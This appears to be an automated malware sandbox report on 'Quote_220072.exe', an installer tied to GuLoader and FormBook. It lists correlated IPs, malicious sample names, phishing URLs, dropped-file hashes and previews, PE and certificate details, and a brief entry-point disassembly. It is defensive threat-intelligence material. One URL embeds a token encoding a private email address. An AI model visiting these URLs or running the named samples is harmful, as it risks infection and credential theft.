                                                        order2024-10-07_174915.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comProposal From Wachler & Associates PC.pdfGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 217.20.57.42
                                                        Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                        • 84.201.210.39
                                                        Proposal From SIOLI Alexander Pino#U2026.pdfGet hashmaliciousUnknownBrowse
                                                        • 84.201.210.23
                                                        http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                        • 84.201.210.38
                                                        0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 84.201.210.37
                                                        67JPbskewt.exeGet hashmaliciousUnknownBrowse
                                                        • 84.201.210.35
                                                        https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                        • 217.20.57.34
                                                        https://cosiosos.com.de/7i2ko/Get hashmaliciousHTMLPhisherBrowse
                                                        • 217.20.57.18
                                                        https://www.leadsonline.caGet hashmaliciousUnknownBrowse
                                                        • 217.20.57.34
                                                        PRESUPUEST.exeGet hashmaliciousAsyncRATBrowse
                                                        • 217.20.57.19
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PUBLIC-DOMAIN-REGISTRYUSTT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 199.79.62.115
                                                        24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                        • 208.91.199.22
                                                        H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                        • 103.53.40.62
                                                        PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 199.79.62.19
                                                        https://landsmith.ae/continue.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 103.53.42.223
                                                        PO# 4507573387.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 199.79.62.115
                                                        PO #89230.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 207.174.215.249
                                                        SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 208.91.199.223
                                                        FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 207.174.215.249
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        V323904LY3.lNK.lnkGet hashmaliciousUnknownBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        oZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        SecuriteInfo.com.FileRepMalware.6479.21607.exeGet hashmaliciousUnknownBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.250.185.193
                                                        • 172.217.18.14
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dllQuotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          gHQQfMh4F3.exeGet hashmaliciousGuLoaderBrowse
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):12288
                                                                            Entropy (8bit):5.97694153396788
                                                                            Encrypted:false
                                                                            SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                            MD5:D6F54D2CEFDF58836805796F55BFC846
                                                                            SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                                            SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                                            SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                            • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                            • Filename: PO-000172483 (2).exe, Detection: malicious, Browse
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                            • Filename: rPO-000172483.exe, Detection: malicious, Browse
                                                                            • Filename: rPO-000172483.exe, Detection: malicious, Browse
                                                                            • Filename: gHQQfMh4F3.exe, Detection: malicious, Browse
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):35
                                                                            Entropy (8bit):4.264578373902383
                                                                            Encrypted:false
                                                                            SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                                            MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                                            SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                                            SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                                            SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:[broadspread]..slyngvrk=houghband..
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):482519
                                                                            Entropy (8bit):1.2446382063037653
                                                                            Encrypted:false
                                                                            SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                                            MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                                            SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                                            SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                                            SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):382628
                                                                            Entropy (8bit):7.615524931322322
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hp5UB/kV1MbtTP3AgT4Q5yAlLwOZ0HSITzdTm3XN96seHBNl5E11S5K:J5UMMbN3t4Q5y2Z0JTzdK3d96T3l5k13
                                                                            MD5:C662F57E58B59BF6D8398CC36965101B
                                                                            SHA1:B2D9813D1CBDD40BD87E88D96D638E8133B39528
                                                                            SHA-256:7FF3268F5BAC4D92B87EE9F88736476E1BEE040E1C4F912F65829675A5EF2220
                                                                            SHA-512:36989CEE939554BF4802342699EFFE1B14F80568119DF66C480659D822FAE065C189099D0AFC42B4581FC12839CC8F7D2E5B9E05B3DC993657B19620AA190DCC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.........LL...........}....@.......................M......."......\.F..............................x......d...........GG..........`...........................11................``........................R..............77.............../.................&&....~..u..5g:~.\Z..^..P.K..._R4...[....'p...@&..a.#..o....dBe.;7....r..f....2..}.C..w..t...i.l)....F.Wk.l....A.%..%x.+...w....0......s.f.)$.....q..L......I.o!..9.. ...yz.*h.S.d.;...Edy...w.F.0.N.2O<v..8?n..Yc."..u........Y..(...V.|r..F..-`....Q{.C.>..H...=/.N.f........7.......3.f.Ts...bJMD]......5GU,.6..j1.g:~.\Z..^..P.K.....f....i..*R4...[....'p...@&..a.#..o....dBe.;7...}.C...5.wE...f.f..@w..t...i.l)....F.Wk.l....A.%..%x.+...w....0X$.....q..L......I.o!.......b..>.9.. ...yz.*h.S.d.;...0.N.2O<v..8?n..Yc."..u........Y..(...V.|............F..-`....Q{.C.>..H...=/.N.........3.f.Ts...b..p..r......&MD]......5GU,.6..j1.g:~.\Z..^..P.K..._f!.f....j..(4...[....'p...@&..a.#..o....dBe.;7...}.C..f.........w..t...i.l)....F.Wk.l....A.%.....Df....E%x.
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288955
                                                                            Entropy (8bit):1.2577770955280814
                                                                            Encrypted:false
                                                                            SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                                            MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                                            SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                                            SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                                            SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):340974
                                                                            Entropy (8bit):1.254605943274635
                                                                            Encrypted:false
                                                                            SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                                            MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                                            SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                                            SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                                            SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):392462
                                                                            Entropy (8bit):1.241128723454179
                                                                            Encrypted:false
                                                                            SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                                            MD5:F130EC3095DBECEDC791D8C58A59040C
                                                                            SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                                            SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                                            SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                                            Malicious:false
                                                                            Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):433786
                                                                            Entropy (8bit):1.255949132332751
                                                                            Encrypted:false
                                                                            SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                                            MD5:53FF1A157920AE92C9BF891D453D6B65
                                                                            SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                                            SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                                            SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                                            Malicious:false
                                                                            Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):374902
                                                                            Entropy (8bit):1.250991222921627
                                                                            Encrypted:false
                                                                            SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                                            MD5:169115C751DDA5E021E8C86E8454B26D
                                                                            SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                                            SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
                                                                            SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                                            Malicious:false
                                                                            Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):489048
                                                                            Entropy (8bit):1.245615736901525
                                                                            Encrypted:false
                                                                            SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                                            MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                                            SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                                            SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                                            SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                                            Malicious:false
                                                                            Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):371
                                                                            Entropy (8bit):4.247837387326688
                                                                            Encrypted:false
                                                                            SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                                            MD5:46003C65AA12A0EBE55662F0141186DC
                                                                            SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                                            SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                                            SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                                            Malicious:false
                                                                            Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                                            Process:C:\Users\user\Desktop\Quote_220072.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):146596
                                                                            Entropy (8bit):4.598858103844812
                                                                            Encrypted:false
                                                                            SSDEEP:1536:VVHH1QAyhbDPjvaN4sRBeriRh7VkKfMyRaCjXavNDYqlgGka5OHV6heD7qI000C/:THHuAkzY4yKKf7sC2vNEqaZ/6hrI0FC/
                                                                            MD5:E9809833C54E3AD937C0891484E15A3A
                                                                            SHA1:64A1D652A38FFD8070B5C110B5D841FCE3B50B88
                                                                            SHA-256:1B992AE5A6C0402C451B53C5E4202BD68D563AB416002C16481F128C8943CC2E
                                                                            SHA-512:1A065EC17F3D780BF38C163C10C7F89F2AEE7E7A5DE199FE52A0E2555696B0A5FEF6DE39383A7CEF8F23F7CBF3821207BD5F49E3DB19394159A30330BB9011FE
                                                                            Malicious:false
                                                                            Preview:.................v.~~..aaaaaaa................`..***...==............5.\\.....=.}}}. ............................L..//...............n.............>.......____.r.............4...............h.}}}........F.....,..LLL...............]....j.......$...s.....55.....................22...........^^^...#........8.llll.......PPPPPP.?...}.<<<<...............d........3.>.77........c....W....(((((....................44...............T......z.......OOO.....................................dd......U...[........+................cc................................[.......?...................*..........######..............s.................>...................TT.............dd.....w.<<<...5.....................(.$$..........................R.......................A...........~~~~..............)......vv............$$$$.........__.<.....(.^.e................\\\........].........rr..............................................................33.....BB................HH.tt...'...c.......XXXX..jj..............
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.812466755832812
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Quote_220072.exe
                                                                            File size:1'197'664 bytes
                                                                            MD5:ac900546c8bf5b3be3184502d0d2d7ba
                                                                            SHA1:6427b2e160082bdb6a5b0213a3de348986f31530
                                                                            SHA256:23df64fa762b5942d08dc6bf6f5afc75fc932519a96070af492e237b5483747f
                                                                            SHA512:4b6bcd3c9413177629668f37160372b65c598a4c5c2ab7eae0905074761e49105b6e954fcfdccae11501120fba4a2dd59d477eab76911a6dd94e184bd7afeb56
                                                                            SSDEEP:24576:T4nhDoAFBOCmg1OJnkFWsksVBNF/ZNXLGQ7WczkxFnfbP97:T+hkcOCm+OWFW+V5BNXKQKczgt
                                                                            TLSH:6F45232976A7C08FEA820A385AF7E33BD67AFD102D25852777602B4EFD3528CDD56110
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                                            Icon Hash:873335651170390f
                                                                            Entrypoint:0x4036da
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=Selvbinderes, O=Selvbinderes, L=Paris 03, C=FR
                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                            Error Number:-2146762487
                                                                            Not Before, Not After
                                                                            • 22/07/2024 03:29:52 22/07/2027 03:29:52
                                                                            Subject Chain
                                                                            • CN=Selvbinderes, O=Selvbinderes, L=Paris 03, C=FR
                                                                            Version:3
                                                                            Thumbprint MD5:2DC2FC958F31DF7E02B170AC81A27DCD
                                                                            Thumbprint SHA-1:22F659C317C7A886E7364E0F3607F3C379B61AF4
                                                                            Thumbprint SHA-256:C191C38E37D3B3A2571E1406691B55FC305D47268B0DC2B40CBB934A663AFAEC
                                                                            Serial:234BC0FC872A6A06C77E178A22EF69418C6CA6A1
                                                                            Instruction
                                                                            sub esp, 000003ECh
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            push edi
                                                                            xor ebx, ebx
                                                                            mov edi, 00408528h
                                                                            push 00008001h
                                                                            mov dword ptr [esp+14h], ebx
                                                                            mov ebp, ebx
                                                                            call dword ptr [00408170h]
                                                                            mov esi, dword ptr [004080ACh]
                                                                            lea eax, dword ptr [esp+2Ch]
                                                                            xorps xmm0, xmm0
                                                                            mov dword ptr [esp+40h], ebx
                                                                            push eax
                                                                            movlpd qword ptr [esp+00000144h], xmm0
                                                                            mov dword ptr [esp+30h], 0000011Ch
                                                                            call esi
                                                                            test eax, eax
                                                                            jne 00007F27F514A7B9h
                                                                            lea eax, dword ptr [esp+2Ch]
                                                                            mov dword ptr [esp+2Ch], 00000114h
                                                                            push eax
                                                                            call esi
                                                                            push 00000053h
                                                                            pop eax
                                                                            mov dl, 04h
                                                                            mov byte ptr [esp+00000146h], dl
                                                                            cmp word ptr [esp+40h], ax
                                                                            jne 00007F27F514A793h
                                                                            mov eax, dword ptr [esp+5Ah]
                                                                            add eax, FFFFFFD0h
                                                                            mov word ptr [esp+00000140h], ax
                                                                            jmp 00007F27F514A78Dh
                                                                            xor eax, eax
                                                                            jmp 00007F27F514A774h
                                                                            mov dl, byte ptr [esp+00000146h]
                                                                            cmp dword ptr [esp+30h], 0Ah
                                                                            jnc 00007F27F514A78Dh
                                                                            movzx eax, word ptr [esp+38h]
                                                                            mov dword ptr [esp+38h], eax
                                                                            jmp 00007F27F514A786h
                                                                            mov eax, dword ptr [esp+38h]
                                                                            mov dword ptr [007A8638h], eax
                                                                            movzx eax, byte ptr [esp+30h]
                                                                            shl ax, 0008h
                                                                            movzx ecx, ax
                                                                            movzx eax, byte ptr [esp+34h]
                                                                            or ecx, eax
                                                                            movzx eax, byte ptr [esp+00000140h]
                                                                            shl ax, 0008h
                                                                            shl ecx, 10h
                                                                            movzx eax, word ptr [eax]
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x1234480x1218.data
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                                            RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                                            RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                                            RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                                            RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                                            RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                                            RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
